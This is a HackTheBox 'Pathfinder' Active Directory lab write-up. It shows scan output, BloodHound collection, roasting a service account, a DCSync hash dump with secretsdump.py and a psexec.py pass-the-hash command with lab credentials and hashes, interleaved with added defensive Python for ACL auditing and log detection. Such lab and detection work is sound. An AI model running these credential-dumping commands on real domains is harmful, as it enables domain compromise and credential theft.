HackTheBox-Pathfinder

ARZ101
5 min read · May 9, 2021

Hello everyone, I hope you are doing well. In this post I will be sharing my writeup for the "Very Easy" Windows Active Directory machine on HackTheBox. It is meant for beginners and awards no points, but I still faced a lot of difficulties in getting the administrator account, so let's jump in.

Rustscan

rustscan -a 10.10.10.30 -- -A -sC -sV
Open 10.10.10.30:53
Open 10.10.10.30:88
Open 10.10.10.30:135
Open 10.10.10.30:139
Open 10.10.10.30:389
Open 10.10.10.30:445
Open 10.10.10.30:464
Open 10.10.10.30:593
Open 10.10.10.30:636
Open 10.10.10.30:3268
Open 10.10.10.30:3269
Open 10.10.10.30:5985
Open 10.10.10.30:9389
PORT STATE SERVICE REASON VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-09 07:40:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
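The port list above is the usual fingerprint of a domain controller, and the same lines can be read by a script rather than by eye. The following is an added example, not part of the original post and not from RustScan or nmap: it parses nmap normal-output port lines (the sample input is the scan above, embedded inline), strips the optional reason column, recovers the AD domain from the LDAP banner, and reports whether the host looks like a DC and which remote-management listeners (SMB, WinRM) it exposes. The set of "DC ports" and the management-port table are assumptions chosen for this example.

```python
import re

# Constructed sample: the open-port lines from the scan above, in nmap's normal-output format.
SAMPLE_SCAN = """\
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-05-09 07:40:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
"""

# One nmap port line: "<port>/<proto> <state> <service> [<version ...>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<rest>.*))?$"
)
# With --reason nmap prints "syn-ack ttl N" before the version; strip it so the field is uniform.
REASON = re.compile(r"^syn-ack(?:\s+ttl\s+\d+)?\s*")

# Assumed set of listeners that, together, mark a Windows domain controller:
# DNS, Kerberos, LDAP/LDAPS, SMB, kpasswd, global catalog and AD Web Services.
DC_PORTS = {53, 88, 389, 445, 464, 636, 3268, 3269, 9389}
# Remote-management listeners worth calling out in an exposure review (assumed table).
MGMT_PORTS = {445: "SMB", 3389: "RDP", 5985: "WinRM (HTTP)", 5986: "WinRM (HTTPS)"}


def parse_scan(text):
    """Return {port: {"proto", "service", "version"}} for every open port in the output."""
    ports = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m or m.group("state") != "open":
            continue
        version = REASON.sub("", m.group("rest") or "")
        ports[int(m.group("port"))] = {
            "proto": m.group("proto"),
            "service": m.group("service"),
            "version": version,
        }
    return ports


def extract_domain(ports):
    """Pull the AD domain out of the LDAP banner. nmap commonly renders the banner
    with a trailing '0.' after the domain name, which is stripped here."""
    for info in ports.values():
        m = re.search(r"Domain:\s*([A-Za-z0-9.-]+)", info["version"])
        if m:
            domain = m.group(1).rstrip(".")
            if domain.endswith("0"):
                domain = domain[:-1]
            return domain
    return None


def profile(ports):
    """Summarise the host role and the management surface a defender should review."""
    open_ports = set(ports)
    return {
        "is_domain_controller": DC_PORTS <= open_ports,
        "domain": extract_domain(ports),
        "management_exposed": [MGMT_PORTS[p] for p in sorted(open_ports) if p in MGMT_PORTS],
    }


if __name__ == "__main__":
    print(profile(parse_scan(SAMPLE_SCAN)))
```

Run against the sample, the profile reports a domain controller for MEGACORP.LOCAL with SMB and WinRM reachable, which is exactly the exposure the rest of this writeup relies on (WinRM for the evil-winrm login, SMB/RPC for psexec).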

PORT 139/445 (SMB)

We check whether there are any SMB shares.

Let's test brute-forcing usernames.

We didn't get anything out of it, but we found the host name PATHFINDER, so let's move on to a different port.

PORT 389 (LDAP)

We will be using the Python-based ingestor for BloodHound, specifying the username and password sandra:Password1234!. I don't know where these credentials could be found; the official writeup references them as coming from a previous machine, which it doesn't name, so I am going to use these credentials to authenticate when using this Python tool.

python3 bloodhound.py -d 'megacorp.local' -u 'sandra' -p 'Password1234!' -gc 'pathfinder.megacorp.local' -c all -ns 10.10.10.30

Let's break down the arguments here:

-d -> specifies the domain name; in this case the domain is megacorp.local, which can be seen in the nmap scan

-u -> specifies the username

-p -> specifies the password

-gc -> specifies the host to query as the global catalog, which is pathfinder, the host name we saw when we were trying to brute force users with crackmapexec

-c -> the collection method; we set this to all, which will try to dump information for Group, LocalAdmin, Session, Trusts, Default (all previous), DCOnly (no computer connections), DCOM, RDP, PSRemote, LoggedOn, ObjectProps, ACL, All (all except LoggedOn)

-ns -> specifies the name server; in this case it is the machine IP

We now have these JSON files.

Let's start neo4j and BloodHound and import these files.

Create an archive of these JSON files.

Drag and drop the archive into the BloodHound GUI. Run the query Find All Domain Admins.

Run the query Find All Kerberoastable Accounts.

Run the query Find Path to Kerberoastable Accounts.

So from running these queries we know that the service account SVC_BES is kerberoastable. Let's run the Python script GetNPUsers.py from Impacket.

Now, running with the -request parameter, we can get a TGT hash.

Going to the hashcat example hashes page, we can see what type of hash this is.

So we are going to use hashcat to crack the hash.

Now that we have cracked the kerberoast hash, and since the WinRM port (5985) is open, we can use evil-winrm to log in with the new credentials.

Now let's look at the results of our BloodHound loot by running the DCSync query, which shows who can dump hashes from NTDS.dit, the database that holds the password hashes for all accounts in AD.

We can see that the user we kerberoasted has the GetChangesAll privilege, which means we can request replication of NTDS.dit.

Using secretsdump.py to dump hashes from NTDS.dit:
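The DCSync query above is a GUI view over the ACEs that bloodhound.py wrote into the domains JSON file. The same audit can be run from the collected file directly, which is how a defender would check who holds replication rights before an attacker finds out. The following is an added example, not part of the original post and not BloodHound's own code: it reads a constructed, simplified domains.json (field names follow the collector's layout, but the SIDs, names and ACE list are made up here), groups ACEs by principal, and reports every principal that holds the GetChanges + GetChangesAll pair (or a right that implies it) and is not one of the groups that hold it by default. The default-replicator set is an assumption for a stock domain.

```python
import json

# Constructed sample in the shape of BloodHound's "domains" collector file, simplified to
# the fields used here. SIDs, names and ACEs are made up for this example.
SAMPLE_DOMAINS_JSON = json.dumps({
    "data": [{
        "Properties": {"name": "MEGACORP.LOCAL", "domain": "MEGACORP.LOCAL"},
        "Aces": [
            {"PrincipalSID": "S-1-5-21-1-2-3-516", "PrincipalType": "Group", "RightName": "GetChanges"},
            {"PrincipalSID": "S-1-5-21-1-2-3-516", "PrincipalType": "Group", "RightName": "GetChangesAll"},
            {"PrincipalSID": "S-1-5-21-1-2-3-512", "PrincipalType": "Group", "RightName": "GetChanges"},
            {"PrincipalSID": "S-1-5-21-1-2-3-512", "PrincipalType": "Group", "RightName": "GetChangesAll"},
            {"PrincipalSID": "S-1-5-21-1-2-3-1106", "PrincipalType": "User", "RightName": "GetChanges"},
            {"PrincipalSID": "S-1-5-21-1-2-3-1106", "PrincipalType": "User", "RightName": "GetChangesAll"},
            # Only half of the pair: cannot pull secrets on its own
            {"PrincipalSID": "S-1-5-21-1-2-3-1107", "PrincipalType": "User", "RightName": "GetChanges"},
            # GenericAll on the domain object implies the replication rights
            {"PrincipalSID": "S-1-5-21-1-2-3-1108", "PrincipalType": "User", "RightName": "GenericAll"},
        ],
    }],
    "meta": {"type": "domains", "count": 1, "version": 4},
})

# Constructed SID -> name map (BloodHound resolves names from users.json / groups.json).
SAMPLE_NAMES = {
    "S-1-5-21-1-2-3-512": "DOMAIN ADMINS@MEGACORP.LOCAL",
    "S-1-5-21-1-2-3-516": "DOMAIN CONTROLLERS@MEGACORP.LOCAL",
    "S-1-5-21-1-2-3-1106": "SVC_BES@MEGACORP.LOCAL",
    "S-1-5-21-1-2-3-1107": "SANDRA@MEGACORP.LOCAL",
    "S-1-5-21-1-2-3-1108": "BACKUPSVC@MEGACORP.LOCAL",
}

# Assumed default holders of replication rights: Domain Admins (RID 512), Domain
# Controllers (516), Enterprise Admins (519), Enterprise Domain Controllers (S-1-5-9)
# and BUILTIN\Administrators (S-1-5-32-544). Anything else is a finding.
DEFAULT_RIDS = {"512", "516", "519"}
DEFAULT_SIDS = {"S-1-5-9", "S-1-5-32-544"}

# The pair of rights that allows replicating secrets, and rights that imply the pair.
REPL_PAIR = {"GetChanges", "GetChangesAll"}
IMPLYING = {"AllExtendedRights", "GenericAll"}


def is_default_replicator(sid):
    return sid in DEFAULT_SIDS or sid.rsplit("-", 1)[-1] in DEFAULT_RIDS


def principals_with_dcsync(domains_json):
    """Return {(domain, sid): rights} for every principal able to replicate secrets."""
    out = {}
    for dom in json.loads(domains_json)["data"]:
        rights = {}
        for ace in dom.get("Aces", []):
            rights.setdefault(ace["PrincipalSID"], set()).add(ace["RightName"])
        for sid, r in rights.items():
            if REPL_PAIR <= r or r & IMPLYING:
                out[(dom["Properties"]["name"], sid)] = r
    return out


def non_default_dcsync(domains_json, names):
    """Findings: DCSync-capable principals outside the default set, with resolved names."""
    return sorted(
        (dom, names.get(sid, sid), sorted(rights))
        for (dom, sid), rights in principals_with_dcsync(domains_json).items()
        if not is_default_replicator(sid)
    )


if __name__ == "__main__":
    for dom, name, rights in non_default_dcsync(SAMPLE_DOMAINS_JSON, SAMPLE_NAMES):
        print(f"{dom}: {name} can DCSync via {', '.join(rights)}")
```

On the sample, SANDRA is not reported because GetChanges alone does not allow pulling secrets, while the service account with the full pair and the account with GenericAll both are; those are the ACEs an administrator should remove or justify.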

./secretsdump.py 'MEGACORP.LOCAL/svc_bes':'Sheffield19'@10.10.10.30 -just-dc-ntlm
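Each credential step in this writeup leaves a distinct trace in the domain controller's Security log, and that is what a defender would alert on. GetNPUsers.py requests an AS-REP for an account that has Kerberos pre-authentication disabled (AS-REP roasting), which the DC logs as event 4768 with pre-authentication type 0; a Kerberoast of an SPN-bearing account (Impacket's GetUserSPNs.py) appears as event 4769 with an RC4 (0x17) service ticket; secretsdump's replication appears as event 4662 carrying the DS-Replication-Get-Changes control-access GUIDs, performed by a user account instead of a DC. The following is an added example, not part of the original post and not from Impacket or any SIEM product: three small detection rules run over constructed event records (flat dicts in the shape a log pipeline produces from EventData; account names and addresses are made up).

```python
# Constructed sample events, already flattened from the Security log into dicts the way a
# SIEM presents EventData fields. Accounts and addresses are made up for this example.
SAMPLE_EVENTS = [
    # AS-REQ without pre-authentication for an account that has it disabled
    {"EventID": 4768, "TargetUserName": "svc_bes", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.9"},
    # Normal logon: pre-auth type 2 (encrypted timestamp) and an AES ticket
    {"EventID": 4768, "TargetUserName": "sandra", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.30"},
    # Service ticket for a user SPN, RC4 requested: the Kerberoast pattern
    {"EventID": 4769, "TargetUserName": "sandra@MEGACORP.LOCAL", "ServiceName": "svc_bes",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.10.14.9"},
    # Service ticket for a computer account with AES: normal
    {"EventID": 4769, "TargetUserName": "sandra@MEGACORP.LOCAL", "ServiceName": "PATHFINDER$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.10.10.30"},
    # Replication control access exercised by a user account: DCSync
    {"EventID": 4662, "SubjectUserName": "svc_bes", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcf2}"},
    # Same control access from a DC computer account: ordinary replication
    {"EventID": 4662, "SubjectUserName": "PATHFINDER$", "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcf2}"},
]

# Control-access right GUIDs that appear in the 4662 Properties field during replication.
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
RC4_HMAC = "0x17"


def is_machine_account(name):
    return name.endswith("$")


def check_asrep_roast(ev):
    """4768 with pre-authentication type 0: a TGT was issued without proving the password."""
    if ev["EventID"] == 4768 and ev.get("PreAuthType") == "0":
        return ("asrep_roast", ev["TargetUserName"],
                f"no pre-auth, etype {ev.get('TicketEncryptionType')} from {ev.get('IpAddress')}")
    return None


def check_kerberoast(ev):
    """4769 with an RC4 ticket for a non-machine, non-krbtgt service: offline-crackable."""
    if ev["EventID"] == 4769 and ev.get("TicketEncryptionType") == RC4_HMAC:
        svc = ev.get("ServiceName", "")
        if not is_machine_account(svc) and svc.lower() != "krbtgt":
            return ("kerberoast", svc,
                    f"RC4 service ticket requested by {ev['TargetUserName']} from {ev.get('IpAddress')}")
    return None


def check_dcsync(ev):
    """4662 with replication GUIDs where the subject is not a computer account."""
    if ev["EventID"] == 4662:
        props = ev.get("Properties", "").lower()
        hits = [name for guid, name in REPL_GUIDS.items() if guid in props]
        if hits and not is_machine_account(ev["SubjectUserName"]):
            return ("dcsync", ev["SubjectUserName"], ", ".join(hits))
    return None


def detect(events):
    """Apply every rule to every event; return (rule, account, detail) for each hit."""
    findings = []
    for ev in events:
        for rule in (check_asrep_roast, check_kerberoast, check_dcsync):
            hit = rule(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for rule, account, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {account}: {detail}")
```

The 4662 rule needs "Audit Directory Service Access" enabled on the DCs, and the 4768/4769 rules need "Audit Kerberos Authentication Service" and "Audit Kerberos Service Ticket Operations"; without those subcategories the events are never written. The mitigations are the mirror image of the rules: re-enable pre-authentication on the roastable account, move service accounts to AES-only keys and long random passwords (or gMSA), and strip replication rights from anything that is not a domain controller.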

We have the hashes, and we don't need to crack them: we can use psexec.py or evil-winrm to authenticate with the NT hash directly (pass-the-hash).

python psexec.py MEGACORP.LOCAL/Administrator@10.10.10.30 -hashes 'aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18'
